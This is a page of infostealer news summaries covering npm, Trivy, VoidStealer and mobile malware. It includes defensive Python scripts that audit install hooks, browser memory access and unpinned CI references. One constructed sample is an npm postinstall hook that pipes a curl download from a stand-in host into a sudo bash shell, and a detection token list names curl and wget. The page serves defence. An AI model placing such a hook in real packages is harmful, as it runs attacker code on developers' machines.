ciso brief

All news with #infostealer tag

337 articles · page 5 of 17

NPM 'Ghost' Campaign Uses Fake Install Logs to Hide Malware

🔍 Security researchers at ReversingLabs uncovered a malicious npm campaign, dubbed the 'Ghost' campaign, that uses fabricated installation logs to conceal downloader behavior. The malicious packages mimic a legitimate install, printing fake dependency downloads and progress bars with random delays, then prompt the user for their sudo password under a false pretext. The captured credential is used to fetch and execute a final-stage remote access trojan that steals crypto wallets and other sensitive data. Researchers advise verifying package authors, reviewing install scripts before running them and treating any sudo prompt during npm install as a red flag.

Ghost campaign uses npm packages to steal crypto wallets

🛡️ Security researchers at ReversingLabs have uncovered a set of malicious npm packages, published under the user name mikilanjillo, that phish for sudo credentials and deploy a multi-stage downloader to steal cryptocurrency wallets and other sensitive data. The packages print fake npm install logs and inject delays to mask what they are doing, then prompt for elevated privileges and retrieve a remote payload via Telegram. The final stage installs a remote access trojan that harvests browser credentials, wallets, SSH keys and developer tokens.

StoatWaffle malware auto-executes via VS Code tasks

🔐 NTT Security warns of a newly disclosed malware strain, StoatWaffle, that executes automatically when a developer opens and trusts a weaponized Visual Studio Code folder. The threat relies on a crafted .vscode/tasks.json whose task sets runOptions.runOn to folderOpen, so that trusting the workspace is enough to launch a Node.js-based loader, credential stealer and RAT with no further user action. The operators, attributed to WaterPlum, are evolving the long-running Contagious Interview campaign to target developer workflows and toolchains.
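The install-time hooks in the two Ghost entries above (npm lifecycle scripts that run during `npm install`) and in the StoatWaffle entry (VS Code tasks that run on folderOpen) can both be audited on a fresh checkout before anything is installed or trusted. The script below is an added example, not code from ReversingLabs, NTT Security or any project named on this page; the suspicious-token list is an assumption to tune for your environment, and the sample package.json and tasks.json are constructed for illustration.

```python
"""Audit a checkout for install-time auto-execution hooks before running
`npm install` or trusting the folder in VS Code.  Added example; the token
list is assumed and the sample files are constructed."""
import json
import re
from pathlib import Path

# Lifecycle scripts that npm runs on its own during `npm install`.
NPM_AUTO_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")

# Tokens that are rarely legitimate inside an install hook (assumed list).
SUSPICIOUS = re.compile(
    r"\b(sudo|curl|wget|base64|eval|bash -c|sh -c|node -e|powershell)\b",
    re.IGNORECASE,
)


def audit_package_json(text: str, path: str = "package.json") -> list[str]:
    """Report every install-time hook; mark hooks with suspicious tokens HIGH."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"{path}: unparseable package.json ({exc.msg}), review manually"]
    scripts = data.get("scripts") if isinstance(data, dict) else None
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook in NPM_AUTO_SCRIPTS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str):
            sev = "HIGH" if SUSPICIOUS.search(cmd) else "INFO"
            findings.append(f"{path}: {sev} {hook} hook runs: {cmd}")
    return findings


def _loads_jsonc(text: str):
    """tasks.json is JSON-with-comments: strip // lines and trailing commas,
    then parse (raises JSONDecodeError if still malformed)."""
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        stripped = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
        stripped = re.sub(r",(\s*[}\]])", r"\1", stripped)
        return json.loads(stripped)


def audit_tasks_json(text: str, path: str = ".vscode/tasks.json") -> list[str]:
    """Flag tasks with runOptions.runOn == "folderOpen": VS Code starts them
    as soon as the folder is opened and trusted."""
    try:
        data = _loads_jsonc(text)
    except json.JSONDecodeError as exc:
        return [f"{path}: unparseable tasks.json ({exc.msg}), review manually"]
    tasks = data.get("tasks") if isinstance(data, dict) else None
    findings = []
    for task in tasks if isinstance(tasks, list) else []:
        if not isinstance(task, dict):
            continue
        run_opts = task.get("runOptions") or {}
        if isinstance(run_opts, dict) and run_opts.get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            findings.append(f"{path}: HIGH task {task.get('label', '?')!r} auto-runs on folderOpen: {cmd.strip()}")
    return findings


def audit_tree(root: str) -> list[str]:
    """Walk a checkout, node_modules included: a dependency's postinstall hook
    is exactly where the campaigns above put their dropper."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.name == "package.json":
            findings += audit_package_json(p.read_text("utf-8", errors="replace"), str(p))
        elif p.name == "tasks.json" and p.parent.name == ".vscode":
            findings += audit_tasks_json(p.read_text("utf-8", errors="replace"), str(p))
    return findings


# Constructed samples: a hook that mimics a progress bar then asks for sudo,
# and a folderOpen task that launches a hidden loader script.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "demo-pkg", "version": "1.0.0",
    "scripts": {
        "postinstall": "node scripts/progress.js && sudo -S bash -c 'curl -fsSL https://example.invalid/s | bash'",
        "test": "jest",
    },
})
SAMPLE_TASKS_JSON = """{
  // constructed sample, not a real workspace file
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "node",
      "args": [".vscode/.loader.js"],
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}"""

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE_PACKAGE_JSON) + audit_tasks_json(SAMPLE_TASKS_JSON):
        print(finding)
```

Run `audit_tree(".")` on a clone before `npm install` and before trusting the folder in VS Code. Two settings reduce exposure independently of the audit: `npm config set ignore-scripts true` (or `npm install --ignore-scripts`) stops lifecycle hooks running at all, at the cost of breaking packages that legitimately build in postinstall, and VS Code's `task.allowAutomaticTasks` set to `off` stops folderOpen tasks even in trusted workspaces.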

Trivy Supply-Chain Attack Spreads to Docker and GitHub

🔔 The TeamPCP threat actor extended its Trivy supply-chain attack by pushing malicious Docker images and hijacking Aqua Security's GitHub organization, tampering with multiple repositories. Socket and other researchers identified Docker Hub images tagged 0.69.5 and 0.69.6 that have no corresponding GitHub release and contain indicators of compromise linked to the TeamPCP Cloud stealer. Aqua said incomplete token rotation after an earlier incident allowed the attackers to reuse credentials; the company has published clean Trivy releases and engaged Sygnia to investigate and remediate.

Trivy Supply Chain Attack Expands With New Images Now

🛡️ Researchers have identified additional compromised Docker images tied to the Trivy supply-chain incident, in which attackers injected credential-stealing malware into official releases and GitHub Actions. New Docker tags 0.69.5 and 0.69.6 were uploaded on March 22 without matching GitHub releases and contain IOCs linked to the TeamPCP infostealer. Aqua Security confirmed the repository tampering and advised teams to treat any CI/CD pipeline that ran the affected scanner as potentially compromised, while noting that its commercial products appear unaffected.

VoidStealer bypasses Chrome ABE to steal browser secrets

🔐 Researchers have identified a new infostealer, VoidStealer, that bypasses Chrome's Application-Bound Encryption (ABE) to exfiltrate stored passwords, cookies and tokens. Unlike earlier ABE bypasses that relied on code injection or elevated privileges, VoidStealer attaches to a browser process as a debugger and uses hardware breakpoints to capture the v20 master key at the moment it exists in plaintext in memory. The malware can fall back to injection-based methods but prefers the stealthier debugger technique. Defenders should monitor for debugger attachments to browser processes, unexpected cross-process memory reads and anomalous Chrome process activity.

FBI: Handala Hackers Use Telegram for Malware C2 Operations

🔐 The FBI warns that Iranian-linked actors, including Handala and a state-associated Homeland Justice group, are using Telegram as command-and-control infrastructure in Windows malware campaigns. Attackers employ social engineering to install malware that exfiltrates screenshots and files from journalists, dissidents, and opposition groups worldwide. The alert followed the seizure of four clearnet domains and references prior disruptive operations such as Handala's attack on Stryker.

Trivy supply-chain breach spreads infostealer via Docker

🚨 Researchers uncovered trojanized Trivy images on Docker Hub after a supply-chain compromise that pushed malicious releases to developer environments. The last known clean release is 0.69.3; tags 0.69.4–0.69.6 were removed after analysis linked several images to the TeamPCP infostealer. The incident also affected related GitHub Actions and spawned downstream npm compromises and repository defacements.

VoidStealer uses debugger trick to steal Chrome master key

🔓 VoidStealer, an infostealer offered as malware-as-a-service since mid-December 2025, uses a debugger-based technique to extract Chrome's v20 master key directly from memory. The malware launches its own suspended, hidden browser process, attaches to it as a debugger and waits for chrome.dll to load before setting hardware breakpoints on an instruction that references the key. When the breakpoint fires during the browser's startup decryption, VoidStealer reads the pointer from the relevant register and calls ReadProcessMemory to copy the plaintext key. No privilege escalation is needed because the stealer created the browser process itself, under the same user account, so it is entitled to debug it. Gen Digital reports this is the first infostealer observed in the wild using this approach.
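A detection sketch for the behaviour both VoidStealer entries describe, a non-browser process opening a Chrome process with debugger-level or memory-read access, as an added example that is not Gen Digital's code or any vendor's rule. It parses the text rendering of Sysmon Event ID 10 (ProcessAccess); the sample events are constructed, the source allowlist is an assumption that needs tuning for your EDR and AV stack, and Sysmon only records these events for browser targets if its configuration asks for them.

```python
"""Detection sketch: alert when a non-browser process opens a Chromium-family
browser process with memory-read or debugger-level access (Sysmon Event 10).
Added example; allowlist is assumed and sample events are constructed."""
import re
from pathlib import PureWindowsPath
from typing import Optional

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe"}
# Sources that routinely open browser processes with broad rights (assumed; tune per environment).
ALLOW_SOURCES = BROWSERS | {"csrss.exe", "lsass.exe", "svchost.exe", "msmpeng.exe"}
# Source binaries living in user-writable locations raise the severity.
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData\\Local|ProgramData|Public)\\", re.IGNORECASE)

# Win32 process access rights relevant to reading or tampering with memory.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
MEMORY_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_READ | PROCESS_VM_WRITE
DEBUG_MASKS = {0x1FFFFF, 0x1F0FFF}  # PROCESS_ALL_ACCESS as logged on debugger attach


def parse_event(block: str) -> dict:
    """Parse the 'Key: Value' lines of a rendered Sysmon event message."""
    fields = {}
    for line in block.splitlines():
        m = re.match(r"^\s*([A-Za-z]+):\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def evaluate(ev: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious ProcessAccess event, else None."""
    src, tgt = ev.get("SourceImage", ""), ev.get("TargetImage", "")
    if PureWindowsPath(tgt).name.lower() not in BROWSERS:
        return None
    if PureWindowsPath(src).name.lower() in ALLOW_SOURCES:
        return None
    try:
        access = int(ev.get("GrantedAccess", "0"), 16)
    except ValueError:
        return None
    if not access & MEMORY_RIGHTS:
        return None  # query-only handles (0x1000, 0x1400) are common and benign
    high = access in DEBUG_MASKS or bool(USER_WRITABLE.search(src))
    return {
        "severity": "HIGH" if high else "MEDIUM",
        "time": ev.get("UtcTime", "?"),
        "source": src,
        "target": tgt,
        "access": f"0x{access:X}",
    }


def scan(log_text: str) -> list[dict]:
    """Split a log dump into blank-line-separated events and evaluate each."""
    alerts = []
    for block in re.split(r"\n\s*\n", log_text.strip()):
        ev = parse_event(block)
        if "GrantedAccess" in ev and "TargetImage" in ev:
            alert = evaluate(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample: Chrome opening its own child, Defender querying, a Temp
# binary attaching with debug rights, a tool reading memory, and a query-only handle.
SAMPLE_LOG = r"""
Process accessed:
UtcTime: 2026-03-23 10:15:02.101
SourceImage: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
GrantedAccess: 0x1FFFFF

Process accessed:
UtcTime: 2026-03-23 10:15:02.377
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
GrantedAccess: 0x1400

Process accessed:
UtcTime: 2026-03-23 10:15:03.004
SourceImage: C:\Users\dev\AppData\Local\Temp\update.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
GrantedAccess: 0x1FFFFF

Process accessed:
UtcTime: 2026-03-23 10:16:41.900
SourceImage: C:\Tools\inspect.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
GrantedAccess: 0x410

Process accessed:
UtcTime: 2026-03-23 10:17:00.250
SourceImage: C:\Users\dev\Downloads\viewer.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
GrantedAccess: 0x1000
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The rule deliberately keys on the access mask rather than on a specific debugger API: DebugActiveProcess, a ReadProcessMemory loop and a thread-context write all show up as a cross-process handle carrying at least one of the three memory rights. Expect noise from EDR, AV and crash reporters until the allowlist matches your fleet.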

Trivy Supply-Chain Breach Pushes Infostealer via GitHub

🛡️ The Trivy vulnerability scanner was compromised in a supply-chain attack that injected an infostealer into official releases and GitHub Actions. Researchers attribute the campaign to TeamPCP, which trojanized the trivy binary (v0.69.4) and replaced the GitHub Action entrypoints, affecting many trivy-action tags. The malware harvested a broad range of credentials, exfiltrated them to a typosquatted C2 domain and established persistence on infected hosts. Organizations that ran affected versions should assume every secret available to those runs is compromised and rotate immediately.

CanisterWorm: npm Worm Spreads via Trivy Supply-Chain Attack

🛡️ The actors behind the Trivy supply-chain compromise are suspected of seeding a self-propagating worm, CanisterWorm, which uses an ICP canister (a smart contract on the Internet Computer blockchain) as a decentralized dead drop for command and control. The infection chain abuses an npm postinstall hook to drop a Python backdoor and establishes persistence through a systemd user service that masquerades as a legitimate unit and restarts automatically. A newer variant harvests local npm tokens during postinstall and launches an automated propagation routine, turning compromised developers and CI pipelines into unwitting distributors.

Trivy scanner backdoored in supply-chain compromise

⚠ The widely used Trivy vulnerability scanner and its official GitHub Actions were backdoored after attackers injected a credential-stealing payload into official releases, the trivy-action and setup-trivy components and published binaries. The malware harvests pipeline secrets by reading process memory and searching filesystems for SSH keys, cloud credentials, Kubernetes tokens, Docker configs and wallets, then exfiltrates the encrypted data to a typosquatted domain or, failing that, by creating a public repository named tpcp-docs. Researchers say the intrusion followed an earlier compromise and incomplete credential rotation that let the attackers regain access through insecurely configured GitHub Actions; victims should rotate secrets immediately and pin Actions to full commit SHAs. Known safe versions are Trivy v0.69.3, trivy-action tag 0.35.0 and setup-trivy 0.2.6.

Trivy GitHub Actions Breach: 75 Tags Hijacked Revealed

🔒 The Trivy open-source scanner and its GitHub Actions integrations (aquasecurity/trivy-action and aquasecurity/setup-trivy) were compromised in March 2026 when an attacker force-pushed 75 version tags to point to malicious commits. The injected Python infostealer harvests CI/CD secrets from runners, attempts exfiltration to an attacker-controlled domain, and can stage stolen data using captured PATs if network exfiltration fails. Vendors advise immediate secret rotation, blocking the malicious domain/IP, and pinning Actions to full commit SHAs.
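The advice repeated across the Trivy entries above (pin Actions to full commit SHAs, because tags were force-pushed; treat the 0.69.4 to 0.69.6 image tags as compromised, with 0.69.3 the last clean release) can be checked mechanically across a repository's workflows. The script below is an added example, not Aqua Security's or Socket's tooling; it uses regexes rather than a YAML parser so it runs without dependencies, and the sample workflow, the placeholder commit SHA and the placeholder digest are constructed.

```python
"""Audit GitHub Actions workflow text for mutable supply-chain references:
actions referenced by tag or branch instead of commit SHA, and Trivy images
referenced by tag instead of digest (or by a known-bad tag).  Added example;
the sample workflow, placeholder SHA and digest are constructed."""
import re
from typing import Optional

SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
IMAGE = re.compile(r"image:\s*['\"]?([^\s'\"#]+)")
# Actions whose tags were force-pushed in the incident: even a tag reported
# as safe is mutable; only a commit SHA is immutable.
HIJACKED_ACTIONS = {"aquasecurity/trivy-action", "aquasecurity/setup-trivy"}
# Image tags the incident reports tie to the trojanized releases.
BAD_TRIVY_TAGS = {"0.69.4", "0.69.5", "0.69.6"}


def check_action_ref(ref: str) -> Optional[str]:
    """Classify an `owner/repo[/path]@ref` string; None means acceptably pinned."""
    target, _, version = ref.partition("@")
    repo = "/".join(target.split("/")[:2])
    if not version:
        return f"HIGH {ref}: no ref, resolves to the default branch"
    if SHA40.match(version):
        return None
    sev = "HIGH" if repo in HIJACKED_ACTIONS else "MEDIUM"
    return f"{sev} {ref}: mutable ref {version!r}, pin to a full commit SHA"


def check_image_ref(ref: str) -> Optional[str]:
    """Classify a container image reference; only a digest is immutable."""
    name, _, digest = ref.partition("@")
    repo, _, tag = name.partition(":")
    if digest.startswith("sha256:"):
        return None
    if repo.endswith("aquasecurity/trivy") and (tag or "latest") in BAD_TRIVY_TAGS:
        return f"CRITICAL {ref}: tag linked to the trojanized Trivy releases"
    return f"MEDIUM {ref}: tag-only image, pin to an @sha256 digest"


def audit_workflow(text: str, path: str = "workflow.yml") -> list[str]:
    """Scan every line for `uses:` and `image:` references and report findings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if m:
            ref = m.group(1)
            if ref.startswith("./"):
                continue  # local composite action, reviewed with the repo itself
            finding = (check_image_ref(ref[len("docker://"):]) if ref.startswith("docker://")
                       else check_action_ref(ref))
        else:
            m = IMAGE.search(line)
            finding = check_image_ref(m.group(1)) if m else None
        if finding:
            findings.append(f"{path}:{lineno}: {finding}")
    return findings


# Constructed sample workflow; the 40 a's and the zero digest are placeholders.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    container:
      image: aquasecurity/trivy:0.69.5
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa # placeholder SHA
      - uses: aquasecurity/trivy-action@0.35.0
      - uses: aquasecurity/setup-trivy@v0.2.6
      - uses: ./.github/actions/local-lint
      - uses: docker://aquasecurity/trivy:0.69.3@sha256:0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW, ".github/workflows/scan.yml"):
        print(finding)
```

Note that `trivy-action@0.35.0` is still reported even though the entries above list 0.35.0 as a safe tag: a tag is a pointer the publisher (or an attacker holding their credentials) can move, which is exactly what happened to 75 tags in this incident. Pin the SHA and keep the tag in a trailing comment for readability.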

Apple Warns Older iPhones Vulnerable to Web Exploit Kits

🔒 Apple is urging users on older versions of iOS to update immediately after reporting that web-based exploit kits such as Coruna and DarkSword have been used to deliver data-stealing malware through compromised websites. Apple says devices on the current release of each supported branch (iOS 15 through iOS 26) are not affected and has shipped targeted patches for legacy hardware. For devices that cannot run a current major version, Apple points users to the latest update available for their branch and recommends enabling Lockdown Mode to reduce exposure.

Global Surge in Mobile Banking Malware Targets 1,243 Brands

📱 Zimperium zLabs reports a global surge in mobile banking malware targeting 1,243 financial brands across 90 countries. The firm analysed 34 active malware families affecting apps with more than three billion downloads and found industrialised campaigns exploiting weak app protections and widespread code sharing. Attacks now intercept authentication codes, hijack live sessions and can take control of devices, undermining traditional backend fraud controls.

Perseus Android Banking Malware Targets Europe and Mideast

🔒 ThreatFabric researchers disclosed a new Android banking malware family named Perseus that enables device takeover and financial fraud through dropper apps promoted on phishing and IPTV sideloading sites. Built on code from Cerberus and Phoenix, Perseus leverages Accessibility-based remote sessions to monitor, interact with, and fully control infected devices. It targets users across Turkey, Italy and other European and Middle Eastern markets, and adds note‑scanning to harvest high-value personal data. Operators can issue remote commands, stream screens, run HVNC sessions, and authorize fraudulent transactions via a command-and-control panel.

Perseus Android Malware Harvests Secrets from Notes

🔐 Researchers at ThreatFabric have discovered a new Android malware family called Perseus that scans user note-taking apps to steal passwords, recovery phrases, and financial data. Distributed via sideloaded IPTV-themed apps, Perseus abuses Accessibility Services to gain full remote control, capture screenshots, and deploy overlays and keyloggers. The threat uses a dropper capable of bypassing Android 13+ sideloading restrictions and performs extensive anti-analysis checks before exfiltration. Users are advised to avoid sideloading APKs, keep Play Protect enabled, and install apps only from the Google Play Store.

ShieldGuard crypto browser extension scam dismantled

🔒 Researchers have dismantled the ShieldGuard crypto scam after Okta Threat Intelligence flagged the malicious browser extension in an advisory on March 17. Marketed as a wallet security tool with social promotion and token "airdrop" incentives, the extension instead harvested wallet addresses, scraped full HTML content after logins and tracked users across sessions. It used obfuscation and a custom JavaScript interpreter to evade Chrome protections and supported remote command-and-control execution. Partners removed the extension from the Chrome Web Store, disabled backend infrastructure, took down domains and blocked sign-in functionality; users are advised to limit plugins, verify sources and treat free-token offers with caution.

Darksword iOS Exploit Used in Wide Infostealer Attacks

🔒 Darksword is a newly discovered iOS exploit kit targeting iPhones running iOS 18.4–18.6.2 and used to harvest credentials, photos, messages, and cryptocurrency wallet data. Researchers from Lookout, Google Threat Intelligence Group, and iVerify linked the framework to the actor behind the Coruna chain and say Apple has patched the exploited flaws. Victims should update to iOS 26.3.1 and consider enabling Lockdown Mode if at high risk.

Vidar Stealer 2.0 Delivered via Fake Game Cheats on GitHub

🎮 Acronis TRU found hundreds of GitHub repositories posing as "free" game cheats that deliver the Vidar 2.0 infostealer, warning the true number of malicious repos could be in the thousands. Campaigns begin in game-focused Discord and Reddit communities and use PS2EXE-compiled PowerShell loaders to evade basic detections. Loaders add Windows Defender exclusions, fetch secondary payload URLs from Pastebin linking to GitHub-hosted binaries, and deploy a Themida-packed Vidar executable that establishes persistence via scheduled tasks. The payload then harvests credentials, tokens and files and exfiltrates them through C2 infrastructure masked by Telegram bots and Steam dead-drop resolvers.